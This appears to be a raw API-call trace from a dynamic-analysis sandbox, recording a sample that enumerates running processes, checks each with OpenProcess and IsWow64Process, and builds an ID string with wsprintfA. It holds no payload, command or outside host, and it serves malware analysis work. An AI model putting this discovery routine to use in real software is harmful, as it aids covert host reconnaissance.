	[0084.191] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397e800, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.191] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0084.191] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397e638, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.191] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0084.191] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397e6f8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.191] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0084.191] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397e638, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.191] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0084.192] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397e6f8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.192] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0084.192] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397e800, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.192] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0084.192] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x397e638, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.192] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x610
	[0084.192] IsWow64Process (in: hProcess=0x610, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.192] CloseHandle (hObject=0x610) returned 1
	[0084.192] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x397e800, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0084.192] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0084.193] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397e848, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.193] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0084.193] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x396e4d0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0084.193] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x610
	[0084.193] IsWow64Process (in: hProcess=0x610, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.193] CloseHandle (hObject=0x610) returned 1
	[0084.193] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x396e730, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0084.193] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0084.193] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397e638, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.193] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x610
	[0084.193] IsWow64Process (in: hProcess=0x610, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.193] CloseHandle (hObject=0x610) returned 1
	[0084.193] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x397e848, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0084.194] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x610
	[0084.194] IsWow64Process (in: hProcess=0x610, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.194] CloseHandle (hObject=0x610) returned 1
	[0084.194] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x397e638, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0084.194] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x610
	[0084.194] IsWow64Process (in: hProcess=0x610, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.194] CloseHandle (hObject=0x610) returned 1
	[0084.194] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x397e800, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0084.194] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x610
	[0084.194] IsWow64Process (in: hProcess=0x610, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.194] CloseHandle (hObject=0x610) returned 1
	[0084.194] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x396e730, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0084.194] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x610
	[0084.194] IsWow64Process (in: hProcess=0x610, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.194] CloseHandle (hObject=0x610) returned 1
	[0084.195] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x397e848, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0084.195] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x610
	[0084.195] IsWow64Process (in: hProcess=0x610, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.195] CloseHandle (hObject=0x610) returned 1
	[0084.195] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x397e6f8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.195] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0084.195] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x397e848, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.195] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x610
	[0084.195] IsWow64Process (in: hProcess=0x610, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.195] CloseHandle (hObject=0x610) returned 1
	[0084.195] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x397e800, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0084.195] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x610
	[0084.195] IsWow64Process (in: hProcess=0x610, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.196] CloseHandle (hObject=0x610) returned 1
	[0084.196] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397e638, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.196] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x610
	[0084.196] IsWow64Process (in: hProcess=0x610, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.196] CloseHandle (hObject=0x610) returned 1
	[0084.196] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x396e410, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0084.196] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0084.196] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x397e800, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0084.196] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x610
	[0084.196] IsWow64Process (in: hProcess=0x610, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.196] CloseHandle (hObject=0x610) returned 1
	[0084.196] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x396e5d0, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0084.196] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x610
	[0084.196] IsWow64Process (in: hProcess=0x610, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.197] CloseHandle (hObject=0x610) returned 1
	[0084.197] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x803010, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0084.197] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x610
	[0084.197] IsWow64Process (in: hProcess=0x610, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.197] CloseHandle (hObject=0x610) returned 1
	[0084.197] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x396e350, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0084.197] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x610
	[0084.197] IsWow64Process (in: hProcess=0x610, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.197] CloseHandle (hObject=0x610) returned 1
	[0084.197] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x3986408, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0084.197] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x610
	[0084.197] IsWow64Process (in: hProcess=0x610, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.197] CloseHandle (hObject=0x610) returned 1
	[0084.197] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x396e490, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0084.198] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x610
	[0084.198] IsWow64Process (in: hProcess=0x610, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.198] CloseHandle (hObject=0x610) returned 1
	[0084.198] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x397e698, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0084.198] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x610
	[0084.198] IsWow64Process (in: hProcess=0x610, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.198] CloseHandle (hObject=0x610) returned 1
	[0084.198] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x397e638, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.198] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x610
	[0084.198] IsWow64Process (in: hProcess=0x610, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.198] CloseHandle (hObject=0x610) returned 1
	[0084.198] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x396e650, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0084.198] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x610
	[0084.198] IsWow64Process (in: hProcess=0x610, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.198] CloseHandle (hObject=0x610) returned 1
	[0084.199] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x396e410, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0084.199] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x610
	[0084.199] IsWow64Process (in: hProcess=0x610, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.199] CloseHandle (hObject=0x610) returned 1
	[0084.199] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x397e848, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0084.199] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x610
	[0084.199] IsWow64Process (in: hProcess=0x610, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.199] CloseHandle (hObject=0x610) returned 1
	[0084.199] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x397e848, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0084.199] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x610
	[0084.199] IsWow64Process (in: hProcess=0x610, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.199] CloseHandle (hObject=0x610) returned 1
	[0084.199] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x3986408, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0084.199] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x610
	[0084.200] IsWow64Process (in: hProcess=0x610, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.200] CloseHandle (hObject=0x610) returned 1
	[0084.200] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x397e800, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0084.200] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x610
	[0084.200] IsWow64Process (in: hProcess=0x610, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.200] CloseHandle (hObject=0x610) returned 1
	[0084.200] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x397e800, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0084.200] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x610
	[0084.200] IsWow64Process (in: hProcess=0x610, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.200] CloseHandle (hObject=0x610) returned 1
	[0084.200] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x396e410, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0084.200] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x610
	[0084.200] IsWow64Process (in: hProcess=0x610, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.200] CloseHandle (hObject=0x610) returned 1
	[0084.201] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x397e848, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0084.201] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x610
	[0084.201] IsWow64Process (in: hProcess=0x610, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.201] CloseHandle (hObject=0x610) returned 1
	[0084.201] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x396e710, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0084.201] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x610
	[0084.201] IsWow64Process (in: hProcess=0x610, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.201] CloseHandle (hObject=0x610) returned 1
	[0084.201] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x3986408, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0084.201] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x610
	[0084.201] IsWow64Process (in: hProcess=0x610, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.201] CloseHandle (hObject=0x610) returned 1
	[0084.201] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x3986408, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0084.202] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x610
	[0084.202] IsWow64Process (in: hProcess=0x610, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.202] CloseHandle (hObject=0x610) returned 1
	[0084.202] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x397e638, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0084.202] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x610
	[0084.202] GetLastError () returned 0x5
	[0084.202] GetLastError () returned 0x5
	[0084.202] GetLastError () returned 0x5
	[0084.202] GetLastError () returned 0x5
	[0084.202] GetLastError () returned 0x5
	[0084.202] GetLastError () returned 0x5
	[0084.202] GetLastError () returned 0x5
	[0084.202] GetLastError () returned 0x5
	[0084.202] GetLastError () returned 0x5
	[0084.202] GetLastError () returned 0x5
	[0084.202] GetLastError () returned 0x5
	[0084.202] GetLastError () returned 0x5
	[0084.202] GetLastError () returned 0x5
	[0084.202] GetLastError () returned 0x5
	[0084.202] GetLastError () returned 0x5
	[0084.202] GetLastError () returned 0x5
	[0084.202] GetLastError () returned 0x5
	[0084.202] GetLastError () returned 0x5
	[0084.202] GetLastError () returned 0x5
	[0084.202] GetLastError () returned 0x5
	[0084.202] GetLastError () returned 0x5
	[0084.202] GetLastError () returned 0x5
	[0084.202] GetLastError () returned 0x5
	[0084.202] GetLastError () returned 0x5
	[0084.202] GetLastError () returned 0x5
	[0084.202] GetLastError () returned 0x5
	[0084.202] GetLastError () returned 0x5
	[0084.203] GetLastError () returned 0x5
	[0084.203] GetLastError () returned 0x5
	[0084.203] GetLastError () returned 0x5
	[0084.203] GetLastError () returned 0x5
	[0084.203] GetLastError () returned 0x5
	[0084.203] GetLastError () returned 0x5
	[0084.203] GetLastError () returned 0x5
	[0084.203] GetLastError () returned 0x5
	[0084.203] GetLastError () returned 0x5
	[0084.203] GetLastError () returned 0x5
	[0084.203] GetLastError () returned 0x5
	[0084.203] GetLastError () returned 0x5
	[0084.203] GetLastError () returned 0x5
	[0084.203] GetLastError () returned 0x5
	[0084.203] GetLastError () returned 0x5
	[0084.203] GetLastError () returned 0x5
	[0084.203] GetLastError () returned 0x5
	[0084.203] GetLastError () returned 0x5
	[0084.203] GetLastError () returned 0x5
	[0084.203] GetLastError () returned 0x5
	[0084.203] GetLastError () returned 0x5
	[0084.203] GetLastError () returned 0x5
	[0084.203] GetLastError () returned 0x5
	[0084.203] GetLastError () returned 0x5
	[0084.203] GetLastError () returned 0x5
	[0084.203] GetLastError () returned 0x5
	[0084.203] GetLastError () returned 0x5
	[0084.203] GetLastError () returned 0x5
	[0084.203] GetLastError () returned 0x5
	[0084.203] GetLastError () returned 0x5
	[0084.203] GetLastError () returned 0x5
	[0084.203] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0084.203] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0084.203] GetProcessTimes (in: hProcess=0x610, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0084.204] GetLastError () returned 0x5
	[0084.204] GetLastError () returned 0x5
	[0084.204] GetLastError () returned 0x5
	[0084.204] GetLastError () returned 0x5
	[0084.204] GetLastError () returned 0x5
	[0084.204] GetLastError () returned 0x5
	[0084.204] GetLastError () returned 0x5
	[0084.204] GetLastError () returned 0x5
	[0084.204] GetLastError () returned 0x5
	[0084.204] GetLastError () returned 0x5
	[0084.204] GetLastError () returned 0x5
	[0084.204] GetLastError () returned 0x5
	[0084.204] GetLastError () returned 0x5
	[0084.204] GetLastError () returned 0x5
	[0084.204] GetLastError () returned 0x5
	[0084.204] GetLastError () returned 0x5
	[0084.204] GetLastError () returned 0x5
	[0084.204] GetLastError () returned 0x5
	[0084.204] GetLastError () returned 0x5
	[0084.204] GetLastError () returned 0x5
	[0084.204] GetLastError () returned 0x5
	[0084.204] GetLastError () returned 0x5
	[0084.204] GetLastError () returned 0x5
	[0084.204] GetLastError () returned 0x5
	[0084.204] GetLastError () returned 0x5
	[0084.204] GetLastError () returned 0x5
	[0084.204] wsprintfA (in: param_1=0x3976208, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0084.204] GetLastError () returned 0x5
	[0084.204] GetLastError () returned 0x5
	[0084.204] GetLastError () returned 0x5
	[0084.204] GetLastError () returned 0x5
	[0084.204] GetLastError () returned 0x5
	[0084.204] GetLastError () returned 0x5
	[0084.204] GetLastError () returned 0x5
	[0084.204] GetLastError () returned 0x5
	[0084.204] GetLastError () returned 0x5
	[0084.204] GetLastError () returned 0x5
	[0084.204] GetLastError () returned 0x5
	[0084.204] GetLastError () returned 0x5
	[0084.204] GetLastError () returned 0x5
	[0084.204] GetLastError () returned 0x5
	[0084.204] GetLastError () returned 0x5
	[0084.204] GetLastError () returned 0x5
	[0084.204] GetLastError () returned 0x5
	[0084.204] GetLastError () returned 0x5
	[0084.204] GetLastError () returned 0x5
	[0084.204] GetLastError () returned 0x5
	[0084.204] GetLastError () returned 0x5
	[0084.204] GetLastError () returned 0x5
	[0084.204] GetLastError () returned 0x5
	[0084.204] GetLastError () returned 0x5
	[0084.204] GetLastError () returned 0x5
	[0084.204] GetLastError () returned 0x5
	[0084.204] GetLastError () returned 0x5
	[0084.205] GetLastError () returned 0x5
	[0084.205] GetLastError () returned 0x5
	[0084.205] GetLastError () returned 0x5
	[0084.205] GetLastError () returned 0x5
	[0084.205] GetLastError () returned 0x5
	[0084.205] GetLastError () returned 0x5
	[0084.205] GetLastError () returned 0x5
